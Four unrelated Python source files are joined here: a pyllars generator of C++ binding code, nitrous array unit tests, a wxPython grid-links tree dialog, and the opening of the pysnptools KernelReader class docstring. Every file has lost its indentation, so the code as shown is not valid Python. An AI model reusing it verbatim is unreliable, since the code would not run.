'-' : 'pyllars::OpUnaryEnum::NEG',
}
binary_mapping = {
'+': 'pyllars::OpBinaryEnum::ADD',
'-': 'pyllars::OpBinaryEnum::SUB',
'*': 'pyllars::OpBinaryEnum::MUL',
'/': 'pyllars::OpBinaryEnum::DIV',
'&': 'pyllars::OpBinaryEnum::AND',
'|': 'pyllars::OpBinaryEnum::OR',
'^': 'pyllars::OpBinaryEnum::XOR',
'<<': 'pyllars::OpBinaryEnum::LSHIFT',
'>>': 'pyllars::OpBinaryEnum::RSHIFT',
'%': 'pyllars::OpBinaryEnum::MOD',
'+=': 'pyllars::OpBinaryEnum::IADD',
'-=': 'pyllars::OpBinaryEnum::ISUB',
'*=': 'pyllars::OpBinaryEnum::IMUL',
'/=': 'pyllars::OpBinaryEnum::IDIV',
'&=': 'pyllars::OpBinaryEnum::IAND',
'|=': 'pyllars::OpBinaryEnum::IOR',
'^=': 'pyllars::OpBinaryEnum::IXOR',
'<<=': 'pyllars::OpBinaryEnum::ILSHIFT',
'>>=': 'pyllars::OpBinaryEnum::IRSHIFT',
'%=': 'pyllars::OpBinaryEnum::IMOD',
'[]': 'Map'
}
if 'default_delete' in self._node.qualifiers:
return None, None
operator_kind = self._node.name.replace("operator", '')
params = [p for p in self._node.children if isinstance(p, NodeType.ParmVarDecl)]
if len(params) > 1:
raise Exception("Unexpected number of operator params")
cpp_op_name = unary_mapping.get(operator_kind) if len(params) == 0 else binary_mapping.get(operator_kind)
if cpp_op_name is None:
raise Exception(f"Unknown operator: {operator_kind}")
class_name = self._node.parent.name
class_full_cpp_name = self._node.parent.full_cpp_name
try:
parent = self._node.parent
while parent and not parent.name and isinstance(parent, NodeType.CXXRecordDecl):
parent = parent.parent
if not parent:
return None, None
parent_name = parent.name
parent_header_path = os.path.join("..", parent_name)
# generate body
body_stream.write(f"""\n#include \"{self.source_path}\"
#include \"{parent_header_path}.hpp\"
#include <{self.source_path}>\n""")
if cpp_op_name == 'Map':
body_stream.write("#include <pyllars/pyllars_classmapoperator.hpp>\n\n")
body_stream.write(f"""template class pyllars::PyllarsClassMapOperator<{self._full_signature()},
&{class_full_cpp_name}::{self._node.name}>;""")
else:
body_stream.write("#include <pyllars/pyllars_classoperator.hpp>\n\n")
body_stream.write(f"""template class pyllars::PyllarsClassOperator<{self._full_signature()},
&{class_full_cpp_name}::{self._node.name}, {cpp_op_name}>;""")
finally:
body_stream.close()
return None, body_stream.name
def _parent_wrapper_name(node: NodeType.Node, recursed: Optional[NodeType.Node] = None):
if False and not node.name:
if node.parent is None:
return None, None, None
return _parent_wrapper_name(node.parent, recursed)
parent = node.parent
if recursed:
node = recursed
if parent.parent:
index = parent.parent.children.index(parent)
if index < 0:
raise Exception("Invalid structure in hierarchy")
is_named_attribute = len(parent.parent.children) -1 > index and isinstance(parent.parent.children[index + 1], NodeType.FieldDecl)
else:
is_named_attribute = False
if parent.name:
if recursed:
return f"__pyllars_internal::PythonAnonymousClassWrapper< ::{parent.full_cpp_name} >",\
f"::{parent.full_cpp_name}", \
f"decltype(::{parent.full_cpp_name}::{node.name})",\
f"::{parent.full_cpp_name}::{node.name}"
else:
return f"__pyllars_internal::PythonClassWrapper< ::{parent.full_cpp_name} >", \
f"::{parent.full_cpp_name}", \
f"decltype(::{parent.full_cpp_name}::{node.name})",\
f"::{parent.full_cpp_name}::{node.name}"
elif is_named_attribute:
# parent is anonymous type with a named field declaration, so this element is referenced to direct parent (field)
parent_field_name = parent.parent.children[index + 1].name
if parent_field_name:
return f"__pyllars_internal::PythonClassWrapper<decltype(::{parent.parent.full_cpp_name}::{parent_field_name})>", \
f"decltype(::{parent.parent.full_cpp_name}::{parent_field_name})", \
f"decltype(::{parent.parent.full_cpp_name}::{parent_field_name}.{node.name})", \
f"decltype(::{parent.parent.full_cpp_name}::{parent_field_name})::{node.name}"
elif parent.parent.name:
return f"__pyllars_internal::PythonClassWrapper<::{parent.parent.full_cpp_name}>", \
f"::{parent.parent.full_cpp_name}", \
f"decltype(::{parent.parent.full_cpp_name}::{node.name})", \
f"::{parent.parent.full_cpp_name}::{node.name}"
else:
return _parent_wrapper_name(parent, node)
elif recursed:
return _parent_wrapper_name(parent, node)
index = parent.parent.children.index(parent)
if index < 0:
raise Exception("Invalid structure in hierarchy")
if is_named_attribute:
# parent is anonymous type with a named field declaration, so this element is referenced to direct parent (field)
parent_field_name = parent.parent.children[index + 1].name
if parent_field_name:
return f"__pyllars_internal::PythonClassWrapper<decltype(::{parent.parent.full_cpp_name}::{parent_field_name})>", \
f"{parent.parent.full_cpp_name}", \
f"decltype(::{parent.parent.full_cpp_name}::{parent_field_name})",\
f"::{parent.parent.full_cpp_name}::{parent_field_name}"
elif parent.parent.name:
return f"__pyllars_internal::PythonClassWrapper<decltype(::{parent.parent.full_cpp_name})>", \
f"::{parent.parent.full_cpp_name}",\
f"decltype(::{parent.parent.full_cpp_name}::{node.name})",\
f"::{parent.parent.full_cpp_name}::{node.name}"
else:
return _parent_wrapper_name(parent, node)
else:
# parent is anonymous type without associated field, so element belongs to parent's parent when referenced in code
if parent.parent.name:
return f"__pyllars_internal::PythonAnonymousClassWrapper< ::{parent.parent.full_cpp_name} >", \
f"::{parent.parent.full_cpp_name}", \
f"decltype(::{parent.parent.full_cpp_name}::{node.name})", \
f"::{parent.parent.full_cpp_name}::{node.name}"
else:
return _parent_wrapper_name(parent, node)
class FieldDeclGenerator(Generator):
def _scoped_type_name(self, typ):
parts = typ.strip().split(' ')
def full_name(t):
if "::" in t:
first, rest = t.split("::", maxsplit=1)
else:
first, rest = t, ""
# search upward for enclosing definition
parent = self._node
while parent:
if hasattr(parent, 'name') and parent.name == first:
return "::" + ("::".join([parent.full_cpp_name, rest]) if rest else parent.full_cpp_name)
parent = parent.parent
# possibly an internally defined class or type:
for child in self._node.parent.children:
if hasattr(child, 'name') and child.name == t:
return '::' + child.full_cpp_name
return t
for index, typ in enumerate(parts):
if not typ in self.KEYWORDS:
parts[index] = full_name(typ)
return ' '.join(parts)
def generate(self):
if 'public' not in self._node.qualifiers and\
(self._node.parent is None or not hasattr(self._node.parent, 'qualifiers')\
or 'struct' not in self._node.parent.qualifiers):
return None, None
if isinstance(self._node, NodeType.IndirectFieldDecl):
return None, None
if not self._node.name:
return None, None
parent = self._node.parent
while parent and not parent.name:
parent = parent.parent
if not parent:
return None, None
bitfield_specs = [c for c in self._node.children if isinstance(c, NodeType.IntegerLiteral)]
if not isinstance(self, VarDeclGenerator) and bitfield_specs:
return self.generate_bitfield(bitfield_specs)
body_stream = open(
os.path.join(self.my_root_dir, self._source_path_root, (parent.name or f"anon_{parent.node_id}") + '::' + (self._node.name or "anon_" + self._node.node_id) + '.cpp'), 'w',
encoding='utf-8')
try:
parent_name = parent.name
parent_header_path = os.path.join("..", parent_name)
# generate body
if 'static' in self._node.qualifiers:
member_qualifier = "Static"
else:
member_qualifier = ""
body_stream.write(f"""\n#include \"{self.source_path}\"
#include \"{parent_header_path}.hpp\"
#include <pyllars/pyllars_class{member_qualifier.lower()}member.hpp>
""")
if not self._node.name:
return None, None
wrapper, parent_type_name, attribute_type_name, attribute_full_cpp_name = _parent_wrapper_name(self._node)
body_stream.write("using namespace pyllars;\n\nnamespace{\n")
body_stream.write(f" constexpr cstring name = \"{self._node.name}\";\n")
body_stream.write("}\n\n")
body_stream.write(f"template class pyllars::PyllarsClass{member_qualifier}Member<name, {parent.full_cpp_name}, {attribute_type_name}, &{attribute_full_cpp_name}>;")
finally:
body_stream.close()
return None, body_stream.name
def generate_bitfield(self, specs: List["NodeType.IntegerLiteral"]):
if len(specs) > 1:
raise Exception("multiple size specs provided for bit feild")
size = specs[0].value
is_const = 'const' in self._node.type_text.split()
name = self._node.name or f"anon_{self._node.node_id}"
wrapper, parent_type_name, attribute_type_name, attribute_full_cpp_name = _parent_wrapper_name(self._node)
body_stream = open(
os.path.join(self.my_root_dir, self._source_path_root, (self._node.parent.name or f"anon_{self._node.parent.node_id}") + '::' +
(self._node.name or "anon_{self._node.node_id}") + '.cpp'), 'w',
encoding='utf-8')
try:
parent = self._node.parent
while parent and not parent.name and isinstance(parent, NodeType.CXXRecordDecl):
parent = parent.parent
if not parent:
return None, None
parent_name = parent.name
parent_header_path = os.path.join("..", parent_name)
# generate body
body_stream.write(f"""\n#include \"{self.source_path}\"
#include \"{parent_header_path}.hpp\"
#include <{self.source_path}>
#include <pyllars/pyllars_classbitfield.hpp>
""")
name = self._node.name
if not name:
return None, None
typename = self._scoped_type_name(self._node.type_text)
const_typename = 'const ' + typename if 'const' not in typename.split() else typename
setter = "" if is_const else f"static std::function<{typename}({parent_type_name}&, {const_typename}&)> setter = []({parent_type_name} & obj, {const_typename}& value)->{typename}{{obj.{name} = value; return value;}};"
body_stream.write(f"""
namespace{{
extern const char name[] = "{name}";
static std::function<{typename}(const {parent_type_name}&)> getter = [](const {parent_type_name} & obj)->{typename}{{return obj.{name};}};
constexpr std::function<{typename}(const {parent_type_name}&)>* getter_p = &getter;
""")
if setter:
body_stream.write(f"""
{setter}
constexpr std::function<{typename}({parent_type_name}&, {const_typename}&)>* setter_p = &setter;
""")
body_stream.write("}\n\n")
body_stream.write(f"""template class pyllars::PyllarsClassBitField<name, {parent_type_name}, {typename}, {size}, getter_p, {"setter_p" if setter else "nullptr"}>;""")
finally:
body_stream.close()
return None, body_stream.name
class VarDeclGenerator(FieldDeclGenerator):
pass
class IndirectFieldDeclGenerator(FieldDeclGenerator):
pass
| |
import unittest
import ctypes
from nitrous.module import module
from nitrous.function import function
from nitrous.types import Long
from nitrous.types.array import Array, FastSlice, Slice, Any
try:
import numpy as np
except ImportError:
np = None
class ArrayTestsBase(object):
def setUp(self):
X, Y, Z = range(3)
@function(Long, a=self.A, b=self.B)
def f(a, b):
m = 0
for i in range(a.shape[X]):
for j in range(a.shape[Y]):
for k in range(a.shape[Z]):
b[m] = a[i, j, k]
m += 1
return m
self.m = module([f])
self.addCleanup(delattr, self, "m")
def test_array(self):
A = (((ctypes.c_long * 2) * 3) * 2)
a = A(((1, 2), (3, 4), (5, 6)),
((7, 8), (9, 10), (11, 12)))
B = ctypes.c_long * 12
b = B()
m = self.m.f(a, b)
self.assertEqual(m, 12)
self.assertEqual(list(b), range(1, 13))
@unittest.skipIf(not np, "NumPy integration feature")
def test_ndarray(self):
dtype = np.dtype("i{0}".format(ctypes.sizeof(ctypes.c_long)))
a = np.array([
((1, 2), (3, 4), (5, 6)),
((7, 8), (9, 10), (11, 12))
], dtype=dtype)
b = np.empty(12, dtype=dtype)
m = self.m.f(a, b)
self.assertEqual(m, 12)
self.assertEqual(list(b), range(1, 13))
class SliceTests(ArrayTestsBase, unittest.TestCase):
A = Slice(Long, (Any,) * 3)
B = Slice(Long)
def test_repr(self):
self.assertEqual(repr(self.A), "Slice(Long, shape=(Any, Any, Any))")
self.assertEqual(repr(self.B), "Slice(Long, shape=(Any,))")
def test_str(self):
self.assertEqual(str(self.A), "<Slice [? x [? x [? x Long]]]>")
self.assertEqual(str(self.B), "<Slice [? x Long]>")
class FastSliceTests(ArrayTestsBase, unittest.TestCase):
A = FastSlice(Long, (2, 3, 2))
B = FastSlice(Long, (12,))
def test_repr(self):
self.assertEqual(repr(self.A), "FastSlice(Long, shape=(2, 3, 2))")
self.assertEqual(repr(self.B), "FastSlice(Long, shape=(12,))")
def test_str(self):
self.assertEqual(str(self.A), "<FastSlice [2 x [3 x [2 x Long]]]>")
self.assertEqual(str(self.B), "<FastSlice [12 x Long]>")
class ArrayTests(ArrayTestsBase, unittest.TestCase):
A = Array(Long, (2, 3, 2))
B = Array(Long, (12,))
def test_repr(self):
self.assertEqual(repr(self.A), "Array(Long, shape=(2, 3, 2))")
self.assertEqual(repr(self.B), "Array(Long, shape=(12,))")
def test_str(self):
self.assertEqual(str(self.A), "<Array [2 x [3 x [2 x Long]]]>")
self.assertEqual(str(self.B), "<Array [12 x Long]>")
class ArrayAllocTests(unittest.TestCase):
def test_alloc_return(self):
"""Allocate array and pass back through return value."""
from nitrous.types import Double
Coord = Array(Double, (3,))
@function(Coord, x=Double, y=Double, z=Double)
def make_coord(x, y, z):
return Coord((x, y, z))
@function(Coord, x=Double, y=Double, z=Double)
def make_coord_2(x, y, z):
return make_coord(x, y, z)
m = module([make_coord, make_coord_2])
c = m.make_coord_2(1.0, 2.0, 3.0)
self.assertEqual(tuple(c), (1.0, 2.0, 3.0))
def test_init_2d(self):
"""Multi-dimensional array initialization."""
from nitrous.types import Double
Double2x2 = Array(Double, (2, 2))
@function(Double2x2, x=Double, y=Double, z=Double, w=Double)
def make_2x2(x, y, z, w):
return Double2x2(((x, y), (z, w)))
m = module([make_2x2])
c = m.make_2x2(1.0, 2.0, 3.0, 4.0)
self.assertEqual(c[0][0], 1.0)
self.assertEqual(c[0][1], 2.0)
self.assertEqual(c[1][0], 3.0)
self.assertEqual(c[1][1], 4.0)
class SliceReferenceTests(unittest.TestCase):
def test_reference_arg(self):
"""Slice is treated as reference type."""
from nitrous.types import is_aggregate
self.assertTrue(is_aggregate(Slice(Long)))
class IndexTests(unittest.TestCase):
def setUp(self):
self.data = (((Long.c_type * 3) * 3) * 3)(
((0, 1, 2), (3, 4, 5), (6, 7, 8)),
((18, 19, 20), (21, 22, 23), (24, 25, 26)),
((9, 10, 11), (12, 13, 14), (15, 16, 17)),
)
self.addCleanup(delattr, self, "data")
def test_static_dimension(self):
"""Replace access to known dimensions with direct constants"""
from nitrous.module import dump
D = Slice(Long, shape=(Any, 3, 3))
X, Y, Z = range(3)
@function(Long, a=D)
def f(a):
return a[2, 1, 2]
m = module([f])
# All indices should be resolved at run-time, so there should be no multiplications.
self.assertNotRegexpMatches(dump(m), "mul")
self.assertEqual(m.f(self.data), 14)
def test_all_dynamic_dimension(self):
"""All dimensions are dynamic, no indices can be resolved at runtime"""
from nitrous.module import dump
D = Slice(Long, shape=(Any, Any, Any))
X, Y, Z = range(3)
@function(Long, a=D)
def f(a):
return a[2, 1, 2]
m = module([f])
# Should have run-time multiplications during index flattening.
self.assertRegexpMatches(dump(m), "mul")
self.assertEqual(m.f(self.data), 14)
def test_mixed_dynamic_dimension(self):
"""Some dimensions are dynamic, other than major one"""
from nitrous.module import dump
D = Slice(Long, shape=(Any, 3, Any))
X, Y, Z = range(3)
@function(Long, a=D)
def f(a):
return a[2, 1, 2]
m = module([f])
# Should have run-time multiplications during index flattening.
self.assertRegexpMatches(dump(m), "mul")
self.assertEqual(m.f(self.data), 14)
class SubsliceTests(unittest.TestCase):
def setUp(self):
self.DataSlice = Slice(Long, (5, 2, 3))
self.data = (((Long.c_type * 3) * 2) * 5)(
((0, 1, 2), (3, 4, 5)),
((6, 7, 8), (18, 19, 20)),
((21, 22, 23), (24, 25, 26)),
((9, 10, 11), (12, 13, 14)),
((15, 16, 17), (33, 34, 35)),
)
self.addCleanup(delattr, self, "DataSlice")
self.addCleanup(delattr, self, "data")
def test_subslice_shape_i(self):
"""Subslice shape reduced by one dimension (two remain)"""
ND, S0, S1 = range(3)
@function(x=self.DataSlice, i=Long, v=Slice(Long))
def get_i(x, i, v):
s = x[i]
v[ND] = s.ndim
v[S0] = s.shape[0]
v[S1] = s.shape[1]
m = module([get_i])
v = (Long.c_type * 3)()
# Shape and dimensions should not depend on indices.
for i in range(5):
m.get_i(self.data, i, v)
self.assertEqual(v[ND], 2)
self.assertEqual(v[S0], 2)
self.assertEqual(v[S1], 3)
def test_subslice_shape_ij(self):
"""Subslice shape reduced by two dimensions (one remains)"""
ND, S0 = range(2)
@function(x=self.DataSlice, i=Long, j=Long, v=Slice(Long))
def get_ij(x, i, j, v):
s = x[i, j]
v[ND] = s.ndim
v[S0] = s.shape[0]
m = module([get_ij])
v = (Long.c_type * 2)()
# Shape and dimensions should not depend on indices.
for i in range(5):
for j in range(2):
m.get_ij(self.data, i, j, v)
self.assertEqual(v[ND], 1)
self.assertEqual(v[S0], 3)
def test_subslice_data_i(self):
"""Subslice data reduced by one dimension (two remain)"""
@function(x=self.DataSlice, i=Long, v=Slice(Long, (2, 3)))
def get_i(x, i, v):
s = x[i]
for j in range(2):
for k in range(3):
v[j, k] = s[j, k]
m = module([get_i])
v = ((Long.c_type * 3) * 2)()
for i in range(5):
m.get_i(self.data, i, v)
ref_v = list(list(row) for row in self.data[i])
self.assertEqual(list(list(row) for row in v), ref_v)
def test_subslice_data_ij(self):
"""Subslice data reduced by one dimension (two remain)"""
@function(x=self.DataSlice, i=Long, j=Long, v=Slice(Long, (3,)))
def get_ij(x, i, j, v):
s = x[i, j]
for k in range(3):
v[k] = s[k]
m = module([get_ij])
v = (Long.c_type * 3)()
for i in range(5):
for j in range(2):
m.get_ij(self.data, i, j, v)
self.assertEqual(list(v), list(self.data[i][j]))
| |
import wx
from .utils import debug, Singleton, Point
from .ca_link import LINK_TYPE_IDS, LINK_TYPE_NAMES
from six import add_metaclass
from random import randint
def get_random_color():
red = randint(0, 255)
green = randint(0, 255)
blue = randint(0, 255)
return (red, green, blue)
class ChangeSpeedDialog(wx.Dialog):
"""Dialog frame to change grids' speed
"""
def __init__(self, parent, id_=None):
super(ChangeSpeedDialog, self).__init__(parent, wx.ID_ANY, "Speed")
self.__parent = parent
self.__id = id_
self.text = wx.TextCtrl(self, value="1")
self.spin = wx.SpinButton(self, style=wx.SP_VERTICAL)
self.spin.SetRange(1, 100)
self.spin.SetValue(1)
self.btn = wx.Button(self, label='Set')
sizerh = wx.BoxSizer(wx.HORIZONTAL)
sizerv = wx.BoxSizer(wx.VERTICAL)
sizerh.Add(self.text, 0, wx.CENTER)
sizerh.Add(self.spin, 0, wx.CENTER)
sizerv.Add(sizerh, 0, wx.CENTER)
sizerv.Add(self.btn, 1, wx.CENTER)
self.SetSizer(sizerv)
self.SetAutoLayout(True)
sizerv.Fit(self)
self.Bind(wx.EVT_BUTTON, self.OnSet, self.btn)
self.Bind(wx.EVT_SPIN, self.OnSpin, self.spin)
self.Show()
def OnSpin(self, event):
"""Spin event
"""
self.text.SetValue(str(event.GetPosition()))
def OnSet(self, event):
"""Set event
"""
self.__parent.SetSpeed(int(self.text.GetValue()), self.__id)
self.Close()
class MyTreeCtrl(wx.TreeCtrl):
"""Widget to manage imported grids
"""
def __init__(self, parent, id_, pos, size, style):
super(MyTreeCtrl, self).__init__(parent, id_, pos, size, style)
self.item = None
self.__notman = None
self.__root = self.AddRoot("Grids")
self.AppendItem(self.__root, "--- THIS GRID ---")
self.__mem_color = dict()
self.__selection = [get_random_color()]
self.Bind(wx.EVT_LEFT_DOWN, self.OnDown)
self.Bind(wx.EVT_RIGHT_DOWN, self.OnDown)
self.Bind(wx.EVT_RIGHT_UP, self.OnRightUp)
self.Bind(wx.EVT_TREE_SEL_CHANGED, self.OnSelChanged)
def del_selection(self):
self.__notman.SetLinkSelection([])
def init_selection(self):
self.__notman.SetLinkSelection(self.__selection)
def set_notebook(self, notebook):
"""Sets notebook's reference
"""
self.__notman = notebook
self.DeleteChildren(self.__root)
first = self.AppendItem(
self.__root, "--- THIS GRID --- with speed = %s" % self.__notman.GetSpeed())
self.SetItemBackgroundColour(first, get_random_color())
def OnSelChanged(self, e):
"""Change selection event
"""
if self.GetSelection().IsOk():
text = self.GetItemText(self.GetSelection())
if text.find("->") != -1:
type_ = id_ = pos = name = None
parent_text = self.GetItemText(
self.GetItemParent(self.GetSelection()))
name, id_ = parent_text.split(
" - with speed =")[0].split(" | id:")
id_ = int(id_)
if text.find("from") != -1:
type_, pos = text.split(" from -> ")
type_ = LINK_TYPE_NAMES[type_]
pos = map(
int, pos.replace("(", "").replace(")", "").split(","))
pos = Point(pos[0], pos[1])
elif text.find("to") != -1:
type_, pos = text.split(" to -> ")
type_ = LINK_TYPE_NAMES[type_]
pos = map(
int, pos.replace("(", "").replace(")", "").split(","))
pos = Point(pos[0], pos[1])
color = self.GetItemBackgroundColour(
self.GetItemParent(self.GetSelection()))
self.__selection = (color, id_, pos, type_)
elif text.find("|") != -1:
name, id_ = text.split(" - with speed =")[0].split(" | id:")
id_ = int(id_)
color = self.GetItemBackgroundColour(self.GetSelection())
self.__selection = (color, id_)
else:
color = self.GetItemBackgroundColour(self.GetSelection())
self.__selection = [color]
try:
self.__notman.SetLinkSelection(self.__selection)
except wx.PyDeadObjectError:
pass
def UpdateTree(self):
"""Update the grids' tree
"""
self.DeleteChildren(self.__root)
first = self.AppendItem(
self.__root, "--- THIS GRID --- with speed = %s" % self.__notman.GetSpeed())
if "first" not in self.__mem_color:
self.__mem_color['first'] = get_random_color()
self.SetItemBackgroundColour(first, self.__mem_color['first'])
if self.__notman:
for id_, links, name, speed in self.__notman.get_linked_grids():
if id_ not in self.__mem_color:
self.__mem_color[id_] = get_random_color()
child = self.AppendItem(
self.__root, "%s | id:%s - with speed = %s" % (name, id_, speed))
self.SetItemBackgroundColour(child, self.__mem_color[id_])
for pos, type_ in links:
if type_ == LINK_TYPE_NAMES["IN"]:
self.AppendItem(child, "IN to -> (%s,%s)" % pos)
elif type_ == LINK_TYPE_NAMES["OUT"]:
self.AppendItem(child, "OUT from -> (%s,%s)" % pos)
self.ExpandAll()
def UpdateGrids(self, e):
"""Update all imported grids
"""
self.__notman.update_grids()
def DeleteGrid(self, e):
"""Delete a grid
"""
debug("DeleteGrid")
text = self.GetItemText(self.GetSelection())
if text == "Grids":
return
if text.find("|") == -1:
text = self.GetItemText(self.GetItemParent(self.GetSelection()))
name, id_ = text.split(" - with speed =")[0].split(" | id:")
self.__notman.delete_grid(int(id_))
self.UpdateTree()
def InsertGrid(self, e):
"""Insert a grid
"""
files_types = "Grid Files (*.cg)|*.cg|File di Testo (*.txt)|*.txt|Tutti i Files (*)|*"
dialog = wx.FileDialog(
self, message="Open grid file", wildcard=files_types, style=wx.FD_OPEN | wx.FD_FILE_MUST_EXIST
)
if dialog.ShowModal() == wx.ID_OK:
path = dialog.GetPath()
self.__notman.insert_grid(path)
self.UpdateTree()
dialog.Destroy()
def ChangeRandomColor(self, e):
"""Change a color of a selected item randomly
"""
# DEBUG
# debug("ChangeRandomColor")
if self.GetItemText(self.GetSelection()).find("THIS") != -1:
self.__mem_color['first'] = get_random_color()
self.SetItemBackgroundColour(
self.GetSelection(), self.__mem_color['first'])
else:
text = self.GetItemText(self.GetSelection())
name, id_ = text.split(" - with speed =")[0].split(" | id:")
self.__mem_color[int(id_)] = get_random_color()
self.SetItemBackgroundColour(
self.GetSelection(), self.__mem_color[int(id_)])
self.ToggleItemSelection(self.GetSelection())
def OnDown(self, event):
"""On down tree event
"""
pt = event.GetPosition()
item, flags = self.HitTest(pt)
if item:
self.SelectItem(item)
else:
self.__notman.SetLinkSelection(self.__selection)
self.UnselectAll()
def SetSpeed(self, speed, id_):
"""Set the speed of a grid
"""
if id_ is None:
self.__notman.SetSpeed(speed)
else:
self.__notman.SetGridsSpeed(speed, id_)
self.UpdateTree()
def ChangeSpeed(self, event):
"""Calling the dialog to change the speed of a grid
"""
if len(self.__selection) > 1:
ChangeSpeedDialog(self, self.__selection[1])
else:
ChangeSpeedDialog(self)
def OnRightUp(self, event):
"""On right up tree event
"""
menu = wx.Menu()
insert_grid = menu.Append(wx.ID_ANY, "Insert grid")
self.Bind(wx.EVT_MENU, self.InsertGrid, insert_grid)
if self.GetSelection().IsOk():
text = self.GetItemText(self.GetSelection())
if text.find("THIS GRID") == -1:
delete_grid = menu.Append(wx.ID_ANY, "Delete grid")
self.Bind(wx.EVT_MENU, self.DeleteGrid, delete_grid)
menu.AppendSeparator()
update_grids = menu.Append(wx.ID_ANY, "Update grids")
self.Bind(wx.EVT_MENU, self.UpdateGrids, update_grids)
if self.GetSelection().IsOk():
text = self.GetItemText(self.GetSelection())
if text.find("|") != -1 or text.find("THIS GRID") != -1:
menu.AppendSeparator()
change_color = menu.Append(wx.ID_ANY, "Change color")
change_speed = menu.Append(wx.ID_ANY, "Change speed")
self.Bind(wx.EVT_MENU, self.ChangeRandomColor, change_color)
self.Bind(wx.EVT_MENU, self.ChangeSpeed, change_speed)
self.PopupMenu(menu)
menu.Destroy()
event.Skip()
@add_metaclass(Singleton)
class GridTreeCtrl(wx.Dialog):
"""Class to manage tree view of imported grids
"""
def __init__(self, parent):
super(GridTreeCtrl, self).__init__(parent, title="Links Manager",
size=(400, 250), style=wx.CAPTION | wx.STAY_ON_TOP)
self.__parent = parent
self._tree = MyTreeCtrl(self, wx.ID_ANY, wx.DefaultPosition, (400, 250),
wx.TR_DEFAULT_STYLE
| wx.TR_LINES_AT_ROOT
| wx.TR_FULL_ROW_HIGHLIGHT
| wx.TR_SINGLE
| wx.TR_HIDE_ROOT
# wx.TR_HAS_BUTTONS
#| wx.TR_EDIT_LABELS
#| wx.TR_MULTIPLE
#| wx.TR_HIDE_ROOT
)
s = wx.BoxSizer()
s.Add(self._tree, 0, wx.EXPAND | wx.ALL)
def UpdateTree(self):
"""Update the tree view
"""
self._tree.UpdateTree()
def SetNotebook(self, notebook):
"""Set the notebook for the tree
"""
self._tree.set_notebook(notebook)
def del_selection(self):
self._tree.del_selection()
def init_selection(self):
self._tree.init_selection()
| |
import numpy as np
import subprocess, sys
import os.path
from itertools import *
import pandas as pd
import logging
import time
import pysnptools.util as pstutil
from pysnptools.pstreader import PstReader
from pysnptools.kernelstandardizer import DiagKtoN
class KernelReader(PstReader):
"""A KernelReader is one of three things:
* A class such as :class:`KernelNpz` for you to specify data in a file. For example,
>>> from pysnptools.kernelreader import KernelNpz
>>>
>>> kernel_on_disk = KernelNpz('../examples/toydata.kernel.npz')
>>> print(kernel_on_disk) # prints specification for reading from file
KernelNpz('../examples/toydata.kernel.npz')
>>> kernel_on_disk.iid_count # prints the number of iids (but doesn't read any kernel values)
500
* A :class:`.KernelData` class that holds kernel data in memory, typically after computing from a SnpReader or reading it from a KernelReader:
>>> # Compute kernel from a SnpReader
>>> from pysnptools.snpreader import Bed
>>> from pysnptools.standardizer import Unit
>>> snp_on_disk = Bed('../../tests/datasets/all_chr.maf0.001.N300',count_A1=False)
>>> kerneldata1 = snp_on_disk.read_kernel(Unit()) #reads the SNP values and computes the kernel
>>> type(kerneldata1.val).__name__ # The val property is an ndarray of kernel values
'ndarray'
>>> print(kerneldata1) # prints the specification of the in-memory kernel information
KernelData(SnpKernel(Bed('../../tests/datasets/all_chr.maf0.001.N300',count_A1=False),standardizer=Unit()))
>>> kerneldata1.iid_count #prints the number of iids (number of individuals) in this in-memory data
300
>>> # Read kernel from a KernelReader
>>> kernel_on_disk = KernelNpz('../examples/toydata.kernel.npz')
>>> kerneldata2 = kernel_on_disk.read() #reads the kernel values
>>> print(kerneldata2) # prints the specification of the in-memory kernel information
KernelData(KernelNpz('../examples/toydata.kernel.npz'))
>>> kerneldata2.iid_count #prints the number of iids (number of individuals) in this in-memory data
500
* A subset of any KernelReader, specified with "[ *iid_index* ]" (or specified with "[ *iid0_index* , *iid1_index* ]"), to read only some kernel values. It can
also be used to re-order the values.
>>> kernel_on_disk = KernelNpz('../examples/toydata.kernel.npz')
>>> subset_on_disk1 = kernel_on_disk[[3,4]] # specification for a subset of the data on disk. No kernel values are read yet.
>>> print(subset_on_disk1.iid_count) # prints the number of iids in this subset (but still doesn't read any kernel values)
2
>>> print(subset_on_disk1) #prints a specification of 'subset_on_disk1'
KernelNpz('../examples/toydata.kernel.npz')[[3,4],[3,4]]
>>> kerneldata_subset = subset_on_disk1.read() # efficiently (if possible) reads the specified subset of values from the disk
>>> print(kerneldata_subset) # prints the specification of the in-memory kernel information
KernelData(KernelNpz('../examples/toydata.kernel.npz')[[3,4],[3,4]])
>>> print((int(kerneldata_subset.val.shape[0]), int(kerneldata_subset.val.shape[1]))) # The dimensions of the ndarray of kernel values
(2, 2)
>>> subset_on_disk2 = kernel_on_disk[[3,4],::2] # specification for a subset of the data on disk. No kernel values are read yet.
>>> print((subset_on_disk2.iid0_count, subset_on_disk2.iid1_count))
(2, 250)
The KernelReaders Classes
================================== ================== ====================== ================== ====================
*Class* *Format* *Random Access* *Suffixes* *Write* method?
:class:`.KernelData` in-memory Yes *n/a* *n/a*
:class:`.KernelNpz` binary No .kernel.npz Yes
:class:`.KernelHdf5` binary Yes .kernel.hdf5 Yes
:class:`.Identity` *n/a* Yes *n/a* No
:class:`.SnpKernel` depends depends *n/a* No
================================== ================== ====================== ================== ====================
Methods & Properties:
Every KernelReader, such as :class:`.KernelNpz` and :class:`.KernelData`, when square has these properties: :attr:`iid`, :attr:`iid_count`,
and these methods: :meth:`read`, and :meth:`iid_to_index`. A square kernel is one that has the same iid list for both its rows and columns.
More generally, KernelReaders can have one iid list for its rows and a different iid list for its columns, so these properties and methods are also defined: :attr:`iid0`, :attr:`iid1`, :attr:`iid0_count`,
:attr:`iid1_count`, :meth:`iid0_to_index`, and :meth:`iid1_to_index`.
See below for details.
:class:`.KernelData` is a KernelReader so it supports the above properties and methods. In addition, it supports property :attr:`.KernelData.val`, method :meth:`.KernelData.standardize`, and equality testing.
See below for details.
Some of the classes, such as :class:`.KernelNpz`, also provide a static :meth:`KernelNpz.write` method for writing :class:`.KernelData`.
>>> # create a kernel from a Bed file and write to KernelNpz format
>>> from pysnptools.snpreader import Bed
>>> from pysnptools.standardizer import Unit
>>> import pysnptools.util as pstutil
>>> from pysnptools.util import print2 # Makes ascii strings look the same under Python2/Python3
>>> kerneldata = Bed('../examples/toydata.bed',count_A1=False).read_kernel(Unit()) # Create a kernel from the data in the Bed file
>>> pstutil.create_directory_if_necessary("tempdir/toydata.kernel.npz")
>>> KernelNpz.write("tempdir/toydata.kernel.npz",kerneldata) # Write data in KernelNpz format
iids:
Individual are identified with an iid, which is a ndarray of two strings: a family ID and a case ID. For example:
>>> kernel_on_disk = KernelNpz('../examples/toydata.kernel.npz')
